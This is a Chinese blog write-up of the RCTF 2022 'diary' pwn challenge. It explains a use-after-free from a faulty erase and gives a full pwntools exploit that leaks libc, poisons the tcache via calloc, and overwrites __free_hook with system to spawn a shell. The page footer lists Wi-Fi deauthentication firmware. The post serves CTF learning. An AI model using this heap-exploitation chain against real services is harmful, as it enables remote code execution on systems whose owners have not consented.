RCTF-pwn-diary

于 2022-12-31 22:48:06 发布
阅读量379 收藏
点赞数 2
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/128509358
版权

RCTF-pwn-diary

赛后看了一眼发现给出了源码,https://github.com/ruan777/RCTF2022/blob/main/diary/main.cpp
漏洞是erase的问题
解释一下

add(0)
add(1)
add(2)
delete(1)

这样子的话,其实就是把2给删除,把2的内容复制到1中,所以2这里有就有个uaf

add(0)
add(1)
add(2)
delete(1)
edit(1, b'aaaaa')

当改成这样时,通过调试可以看见fd被改了
在这里插入图片描述
利用用这个特性可以uaf出libc,把unsortedbin同时打进tcache和unsortedbin中,这样的话show的时候就会show出libc
接着就需要任意地址写了,直接edit的话前面会有4个空格,所以不好改
在这里插入图片描述
可以发现在enc这个功能里会calloc,calloc并不会从tcache里取,会从unsortedbin中取出,并会将content + offest的内容复制到fd中,所以可以控制offset为4,length为8, 并提前将一个chunk的fd,edit出带有hook的地址,这样enc之后hook上的地址成功跑进tcache的fd中
在这里插入图片描述
接着需要从calloc那里取的剩下的填满,不然会发生一些错误
在这里插入图片描述
hook上的地址成功到第一位,再申请的时候就申请的是hook上的地址,这里设置的hook地址是free_hook - 8,因为add的时候前面会有4个空格, ;sh;这样4 + 3刚好是8,后面是free_hook,所以是 ;sh; + p64(system),add的时候刚好后面又后调用free_hook,就可以getshell了

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './diary'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('119.13.105.35', 10111)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'test cmd:\n'

def add(year=0, content = b'a'):
    r.sendlineafter(menu, b'add#' + str(year).encode() + b'#0#0#0#0#0#' + content)

def edit(index, content):
    r.sendlineafter(menu, b'update#' + str(index).encode() + b'#' + content)

def show(index):
    r.sendlineafter(menu, 'show#' + str(index))

def delete(index):
    r.sendlineafter(menu, 'delete#' + str(index))

def encrypt(index, offest, l):
    r.sendlineafter(menu, 'encrypt#' + str(index) + '#' + str(offest) + '#' + str(l))

def decrypt(index):
    r.sendlineafter(menu, 'decrypt#' + str(index))

for i in range(10):
    add(i)

for i in range(9, 3, -1):
    delete(i)

delete(1)

edit(2, b'aaaa')
delete(1)
show(1)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
li('malloc_hook = ' + hex(malloc_hook))

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = malloc_hook - libc.sym['__malloc_hook']

free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))
system_addr = libc_base + libc.sym['system']
li('system_addr = ' + hex(system_addr))

edit(0, p64(free_hook - 0x8))

encrypt(0,4,6)

add(10, b'a' * 0x2d0)

add(11, b';sh;' + p64(system_addr))

r.interactive()

在这里插入图片描述

z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
【picoCTF2022】Pwn部分
Sparks_Pion的博客
03-29 688
basic-file-exploit if ((entry_number = strtol(entry, NULL, 10)) == 0) { puts(flag); fseek(stdin, 0, SEEK_END); exit(0); } 查询 0 号就可以了 ┌──(root㉿LAPTOP-Sparks)-[/tmp] └─# nc saturn.picoctf.net 52682 Hi, welcome to my echo chamber! Type '1' to ent
RCTF2022 reverse 部分writeup
qq_41866334的博客
12-13 2858
huowang picstore checkserver 等题
2022年强网杯rcefile wp
weixin_52829570的博客
08-01 1184
查看源码中config.inc.php,发现对cookie做了反序列化,并存在spl_autoload_register()函数。所以上传一个phar文件,并把Content-Type改成image/png。常见的大小写绕过,空格绕过,php4这种都可以绕过成功上传,但都不解析。cookie的userfile就是上传文件加密过的文件名来构造序列化。知道了flag的位置所以我们重新上传一个catflag的inc文件。带着构造的cookie进行访问可以看到代码被执行了。O32"文件名"0{}...
2022HECTF部分WP
qq_63928796的博客
11-07 619
扫描目录找到找到/.htases目录提示访问之后,看路由去1目录提示hebnu,之后让用post方式,返回后是乱码可以用谷歌插件之后改referer头flag在ctf库下的3eDf4f07efC9ee16表下flag字段。
RORCTF2020 部分wp
会下雪的晴天
12-12 517
跟着太空人师傅一队,被带飞,spaceman太强辣!最终取得总积分26名,也得奖了很开心,只是现在还没说奖励是啥哈哈哈,放张图纪念一下嘿嘿 目录MISCFMWEBezsql你能登陆吗&你能登陆吗2Calc MISC FM Ubuntu下载gqrx,然后载入iq文件,将Filter width改为WFM(mono)接着start,去听声音,读出来的数字+字母即为flag WEB ezsql MySql8新版特性,使用tqble代替select 多谢M3师傅提醒 补:pass注入select .
[XCTF-pwn] 33_rctf-2015_nobug
weixin_52640415的博客
03-10 408
格式化字符串漏洞 snprintf 程序先读入串,再用snprintf输出,由于snprintf有长度限制,每次只能一位一位的改。 int sub_8048B76() { size_t v0; // eax const char *v1; // eax v0 = strlen(s); v1 = (const char *)sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, "%s", v1); } 思路:
[XCTF-pwn] 10-welpwn-rctf-2015
weixin_52640415的博客
02-26 240
很久前的题,主程序里没有溢出,echo里遇0截断这里虽有溢出但也写不了rop,64们0太多了。 思路是,A*0x10+0这样会将rbp的尾部1字节置0,然后在payload尾部写rop,中间补ret int __cdecl main(int argc, const char **argv, const char **envp) { char buf[1024]; // [rsp+0h] [rbp-400h] BYREF write(1, "Welcome to RCTF\n", 0x10uL
[BUUCTF-pwn] rctf2018_stringer
weixin_52640415的博客
01-21 576
当calloc 遇见 mmap 有题有个free明显的UAF,但是建块用的calloc会清0又没有show,就比较麻烦了。 有个edit int sub_E5E() { int result; // eax unsigned int v1; // [rsp+Ch] [rbp-14h] unsigned int v2; // [rsp+10h] [rbp-10h] unsigned int v3; // [rsp+14h] [rbp-Ch] __int64 v4; // [rsp+
RCTF-2015 nobug
doudoudedi
06-07 692
思路 有一个格式化字符串的漏洞 int sub_8048B32() { int v0; // eax const char *v1; // eax v0 = strlen(s); v1 = sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, v1); } 题目没有开nx我们可以直接布置好shellcode然后跳过去观察栈发现一个地方可以利用 .text:08048BD7 sub
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
html+css+js网页设计 个人博客模版 4个页面
最新发布
08-28
预览地址:https://blog.csdn.net/qq_42431718/article/details/141647657 html+css+js网页设计 个人博客模版 4个页面
shibing624-text2vec-base-chinese模型文件
08-28
shibing624_text2vec-base-chinese模型文件
springboot167基于springboot的医院后台管理系统的设计与实现.zip
08-28
信息数据从传统到当代,是一直在变革当中,突如其来的互联网让传统的信息管理看到了革命性的曙光,因为传统信息管理从时效性,还是安全性,还是可操作性等各个方面来讲,遇到了互联网时代才发现能补上自古以来的短板,有效的提升管理的效率和业务水平。传统的管理模式,时间越久管理的内容越多,也需要更多的人来对数据进行整理,并且数据的汇总查询方面效率也是极其的低下,并且数据安全方面永远不会保证安全性能。结合数据内容管理的种种缺点,在互联网时代都可以得到有效的补充。结合先进的互联网技术,开发符合需求的软件,让数据内容管理不管是从录入的及时性,查看的及时性还是汇总分析的及时性,都能让正确率达到最高,管理更加的科学和便捷。本次开发的医院后台管理系统实现了病房管理、病例管理、处方管理、字典管理、公告信息管理、患者管理、药品管理、医生管理、预约医生管理、住院管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让医院后台管理系统更能从理念走到现实,确确实实的让人们提升信息处理效率。
高分项目-婚纱摄影小程序源码(优秀毕业设计源码 + 运行截图).zip
08-28
1. 系统精选小程序代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:java,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,编程资源宝库是一个集合了各种编程资源的网站,包括编程教程、开发工具、代码示例、项目模板等。项目支持远程调试部署 运行安装 二次开发,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/qq_38408785?type=download
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值